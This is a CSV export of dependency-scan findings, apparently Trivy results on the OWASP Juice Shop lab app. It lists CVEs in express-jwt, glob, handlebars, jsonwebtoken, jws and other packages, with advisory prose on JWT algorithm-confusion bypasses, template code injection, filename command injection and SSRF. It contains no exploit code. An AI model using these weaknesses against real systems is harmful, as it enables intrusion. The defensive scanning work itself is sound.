2.3.2,False,False,,2026-05-12 17:37:05.018158+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2024-4068,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],express-jwt,0.1.3,2026-05-12 17:37:05.041517+00:00,CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N,7.7,,,285,2026-05-12,,,"Authorization bypass in express-jwt NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 6.0.0 NEWLINE NEWLINE In express-jwt (NPM package) up and including version 5.3.3, the algorithms entry to be specified in the configuration is not being enforced. When algorithms is not specified in the configuration, with the combination of jwks-rsa, it may lead to authorization bypass. 
You are affected by this vulnerability if all of the following conditions apply: - You are using express-jwt - You do not have **algorithms** configured in your express-jwt configuration. - You are using libraries such as jwks-rsa as the **secret**. You can fix this by specifying **algorithms** in the express-jwt configuration. See linked GHSA for example. This is also fixed in version 6.0.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/package.json,,True,,False,False,,False,,4dcd0b3c67f7504e208fa2d06bcb0f2135df3d457030cb041e4b0b4323d3c292,89,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.041571+00:00,,,,,0,[],6.0.0,,S1,False,,,,,,,,False,https://github.com/auth0/express-jwt/commit/7ecab5f8f0cab5297c2b863596566eb0c019cdef NEWLINE https://github.com/auth0/express-jwt/security/advisories/GHSA-6g6m-m6h5-w9gf NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2020-15084,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2020-15084 Express-JWT 0.1.3,False,False,,2026-05-12 17:37:05.041525+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2020-15084,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],glob,10.4.5,2026-05-12 17:37:05.049693+00:00,CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H,7.5,,,78,2026-05-12,,,"glob: glob: Command Injection Vulnerability via Malicious Filenames NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 11.1.0, 10.5.0 NEWLINE NEWLINE Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. 
When glob -c are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/glob/package.json,,True,,False,False,,False,,e3ba4d9f77a254be6d1a31ae5cc550e5a04a52a5ba64aded3a7d3a3210764ace,91,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.049757+00:00,,,,,0,[],"11.1.0, 10.5.0",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-64756 NEWLINE https://github.com/isaacs/node-glob NEWLINE https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f NEWLINE https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146 NEWLINE https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-64756 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-64756,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-64756 Glob 10.4.5,False,False,,2026-05-12 17:37:05.049701+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-64756,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.060411+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,94,2026-05-12,,,"handlebars: Handlebars: Arbitrary code execution via @partial-block overwrite NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the `@partial-block` special variable is stored in the template data context and is reachable and mutable from within a template via helpers that accept arbitrary objects. 
When a helper overwrites `@partial-block` with a crafted Handlebars AST, a subsequent invocation of `{{> @partial-block}}` compiles and executes that AST, enabling arbitrary JavaScript execution on the server. Version 4.7.9 fixes the issue. Some workarounds are available. First, use the runtime-only build (`require('handlebars/runtime')`). The `compile()` method is absent, eliminating the vulnerable fallback path. Second, audit registered helpers for any that write arbitrary values to context objects. Helpers should treat context data as read-only. Third, avoid registering helpers from third-party packages (such as `handlebars-helpers`) in contexts where templates or context data can be influenced by untrusted input. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,637e1eb8a1f50b9c2c27c1de14f835fc63c2ab3450e9052282c0f7df8664166b,94,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.060471+00:00,,,,,0,[],4.7.9,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33938 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33938 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33938,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33938 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.060420+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33938,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.064625+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,754,2026-05-12,,,"handlebars.js: Handlebars.js: 
Denial of Service via malformed decorator syntax in template compilation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, when a Handlebars template contains decorator syntax referencing an unregistered decorator (e.g. `{{*n}}`), the compiled template calls `lookupProperty(decorators, ""n"")`, which returns `undefined`. The runtime then immediately invokes the result as a function, causing an unhandled `TypeError: ... is not a function` that crashes the Node.js process. Any application that compiles user-supplied templates without wrapping the call in a `try/catch` is vulnerable to a single-request Denial of Service. Version 4.7.9 fixes the issue. Some workarounds are available. Wrap compilation and rendering in `try/catch`. Validate template input before passing it to `compile()`; reject templates containing decorator syntax (`{{*...}}`) if decorators are not used in your application. Use the pre-compilation workflow; compile templates at build time and serve only pre-compiled templates; do not call `compile()` at request time. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,43956e7e7974022d3129f6581c08e32a419f85dc924d834f3f34c481d1ac539f,95,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.064680+00:00,,,,,0,[],4.7.9,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33939 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33939 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33939,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33939 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.064634+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33939,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.068123+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,94,2026-05-12,,,"handlebars.js: Handlebars.js: Arbitrary code execution via crafted template context NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, a crafted object placed in the template context can bypass all conditional guards in `resolvePartial()` and cause `invokePartial()` to return `undefined`. The Handlebars runtime then treats the unresolved partial as a source that needs to be compiled, passing the crafted object to `env.compile()`. Because the object is a valid Handlebars AST containing injected code, the generated JavaScript executes arbitrary commands on the server. 
The attack requires the adversary to control a value that can be returned by a dynamic partial lookup. Version 4.7.9 fixes the issue. Some workarounds are available. First, use the runtime-only build (`require('handlebars/runtime')`). Without `compile()`, the fallback compilation path in `invokePartial` is unreachable. Second, sanitize context data before rendering: Ensure no value in the context is a non-primitive object that could be passed to a dynamic partial. Third, avoid dynamic partial lookups (`{{> (lookup ...)}}`) when context data is user-controlled. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,48dea58cf5a044f9c68cb3535c2475fdb13313f8efb20a86097d54a01117071b,96,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.068209+00:00,,,,,0,[],4.7.9,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33940 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33940 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33940,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33940 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.068133+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33940,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.072320+00:00,CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H,8.3,,,79,2026-05-12,,,"handlebars.js: Handlebars: Arbitrary code execution via CLI precompiler input sanitization flaw NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE 
NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser. Version 4.7.9 fixes the issue. Some workarounds are available. First, validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (`""`, `'`, `;`, etc.). Second, use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines. Third, run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation. Fourth, audit template filenames in any repository or package that is consumed by an automated build pipeline. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,1b0455809d4368b73089dedc306358047751a61f952332dcc134447320cc0e0d,97,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.072377+00:00,,,,,0,[],4.7.9,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33941 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33941 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33941,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33941 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.072329+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33941,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],http-cache-semantics,3.8.1,2026-05-12 17:37:05.088529+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.1.1 NEWLINE NEWLINE This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/http-cache-semantics/package.json,,True,,False,False,,False,,571fd4fc46d4f69792e2fc2b1ef536fa0c2b102b3c55018951bb7e234935d0c7,101,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.088588+00:00,,,,,0,[],4.1.1,,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2023:2655 NEWLINE https://access.redhat.com/security/cve/CVE-2022-25881 NEWLINE https://bugzilla.redhat.com/2165824 NEWLINE https://bugzilla.redhat.com/2168631 NEWLINE https://bugzilla.redhat.com/2171935 NEWLINE https://bugzilla.redhat.com/2172190 NEWLINE https://bugzilla.redhat.com/2172204 NEWLINE https://bugzilla.redhat.com/2172217 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2165824 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2168631 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2171935 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2172190 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2172204 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2172217 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2178076 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25881 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4904 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23918 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23920 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23936 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24807 NEWLINE https://errata.almalinux.org/9/ALSA-2023-2655.html NEWLINE https://errata.rockylinux.org/RLSA-2023:2655 NEWLINE https://github.com/kornelski/http-cache-semantics NEWLINE https://github.com/kornelski/http-cache-semantics/blob/master/index.js%23L83 NEWLINE https://github.com/kornelski/http-cache-semantics/commit/560b2d8ef452bbba20ffed69dc155d63ac757b74 NEWLINE https://linux.oracle.com/cve/CVE-2022-25881.html NEWLINE 
https://linux.oracle.com/errata/ELSA-2023-2655.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-25881 NEWLINE https://security.netapp.com/advisory/ntap-20230622-0008 NEWLINE https://security.netapp.com/advisory/ntap-20230622-0008/ NEWLINE https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253332 NEWLINE https://security.snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783 NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-25881,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-25881 HTTP-Cache-Semantics 3.8.1,False,False,,2026-05-12 17:37:05.088538+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-25881,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],ip,2.0.1,2026-05-12 17:37:05.092719+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,918,2026-05-12,,,"node-ip: Incomplete fix for CVE-2023-42282 NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ip/package.json,,False,,False,False,,False,,095bbcab1d8ca926b2c9546a5fb3445d4381be03eb8f1f07dd0c96ccab7a9357,102,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.092785+00:00,,,,,0,[],,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2024-29415 NEWLINE https://cosmosofcyberspace.github.io/npm_ip_cve/npm_ip_cve.html NEWLINE https://github.com/indutny/node-ip NEWLINE https://github.com/indutny/node-ip/issues/150 NEWLINE https://github.com/indutny/node-ip/pull/143 NEWLINE https://github.com/indutny/node-ip/pull/144 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2024-29415 NEWLINE https://security.netapp.com/advisory/ntap-20250117-0010 NEWLINE https://security.netapp.com/advisory/ntap-20250117-0010/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2024-29415,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2024-29415 Ip 2.0.1,False,False,,2026-05-12 17:37:05.092728+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2024-29415,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.1.0,2026-05-12 17:37:05.108986+00:00,CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N,8.1,,,327,2026-05-12,,,"jsonwebtoken: Unrestricted key type could lead to legacy keys usagen NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 9.0.0 NEWLINE NEWLINE Versions `<=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. 
Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,6f3dfc185629e8776a771b457a4512c2368ac2ffd1ac30190e791b23ed9a0968,106,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.109074+00:00,,,,,0,[],9.0.0,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2022-23539 NEWLINE https://github.com/auth0/node-jsonwebtoken NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3 NEWLINE https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-23539 NEWLINE https://security.netapp.com/advisory/ntap-20240621-0007 NEWLINE https://security.netapp.com/advisory/ntap-20240621-0007/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-23539,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-23539 Jsonwebtoken 0.1.0,False,False,,2026-05-12 17:37:05.108999+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-23539,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.1.0,2026-05-12 17:37:05.113469+00:00,,,,,0,2026-05-12,,,"Verification Bypass NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=4.2.2 NEWLINE NEWLINE It is possible for an attacker to bypass verification when ""a token digitally signed with an asymetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family)"" [1] 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,8c52b3d98311b402fcdd15a9b1d27153f2446f6a7a59b2c0fd542611007172c5,107,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.113524+00:00,,,,,0,[],>=4.2.2,,S1,False,,,,,,,,False,https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687 NEWLINE https://www.timmclean.net/2015/02/25/jwt-alg-none.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,NSWG-ECO-17 Jsonwebtoken 0.1.0,False,False,,2026-05-12 17:37:05.113478+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,NSWG-ECO-17,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.4.0,2026-05-12 17:37:05.130088+00:00,CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N,8.1,,,327,2026-05-12,,,"jsonwebtoken: Unrestricted key type could lead to legacy keys usagen NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 9.0.0 NEWLINE NEWLINE Versions `<=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. 
After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,ca3b8b343542a955f549294d867be0a27219b1a0857a8fc24fb609e981327d70,111,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.130144+00:00,,,,,0,[],9.0.0,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2022-23539 NEWLINE https://github.com/auth0/node-jsonwebtoken NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3 NEWLINE https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-23539 NEWLINE https://security.netapp.com/advisory/ntap-20240621-0007 NEWLINE https://security.netapp.com/advisory/ntap-20240621-0007/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-23539,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-23539 Jsonwebtoken 0.4.0,False,False,,2026-05-12 17:37:05.130096+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-23539,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.4.0,2026-05-12 17:37:05.133841+00:00,,,,,0,2026-05-12,,,"Verification Bypass NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=4.2.2 NEWLINE NEWLINE It is possible for an attacker to bypass verification when ""a token digitally signed with an asymetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family)"" [1] NEWLINE 
",False,,,False,,,,False,juice-shop/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,0142e140f79a7a7ac358e4012958cf9a35cf175d14eed3fcb56c91f6a1a62771,112,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.133894+00:00,,,,,0,[],>=4.2.2,,S1,False,,,,,,,,False,https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687 NEWLINE https://www.timmclean.net/2015/02/25/jwt-alg-none.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,NSWG-ECO-17 Jsonwebtoken 0.4.0,False,False,,2026-05-12 17:37:05.133849+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,NSWG-ECO-17,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jws,0.2.6,2026-05-12 17:37:05.145735+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N,8.7,,,0,2026-05-12,,,"Forgeable Public/Private Tokens NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=3.0.0 NEWLINE NEWLINE Since ""algorithm"" isn't enforced in `jws.verify()`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. NEWLINE NEWLINE In addition, there is the `none` algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the `alg` field is set to `none`. NEWLINE NEWLINE *Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. 
Thanks to Fabien Catteau for reporting the error.* NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/jws/package.json,,True,,False,False,,False,,fc82af3efd8f08845b524488304dda7da7859112ccd3757af3ffa43814fda976,115,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.145848+00:00,,,,,0,[],>=3.0.0,,S1,False,,,,,,,,False,https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/brianloveswords/node-jws NEWLINE https://github.com/brianloveswords/node-jws/commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2016-1000223 NEWLINE https://snyk.io/vuln/npm:jws:20160726 NEWLINE https://www.npmjs.com/advisories/88,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2016-1000223 JWS 0.2.6,False,False,,2026-05-12 17:37:05.145750+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2016-1000223,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jws,0.2.6,2026-05-12 17:37:05.149906+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N,7.5,,,347,2026-05-12,,,"node-jws: auth0/node-jws: Improper signature verification in HS256 algorithm NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.2.3, 4.0.1 NEWLINE NEWLINE auth0/node-jws is a JSON Web Signature implementation for Node.js. In versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an improper signature verification vulnerability when using the HS256 algorithm under specific conditions. Applications are affected when they use the jws.createVerify() function for HMAC algorithms and use user-provided data from the JSON Web Signature protected header or payload in HMAC secret lookup routines, which can allow attackers to bypass signature verification. 
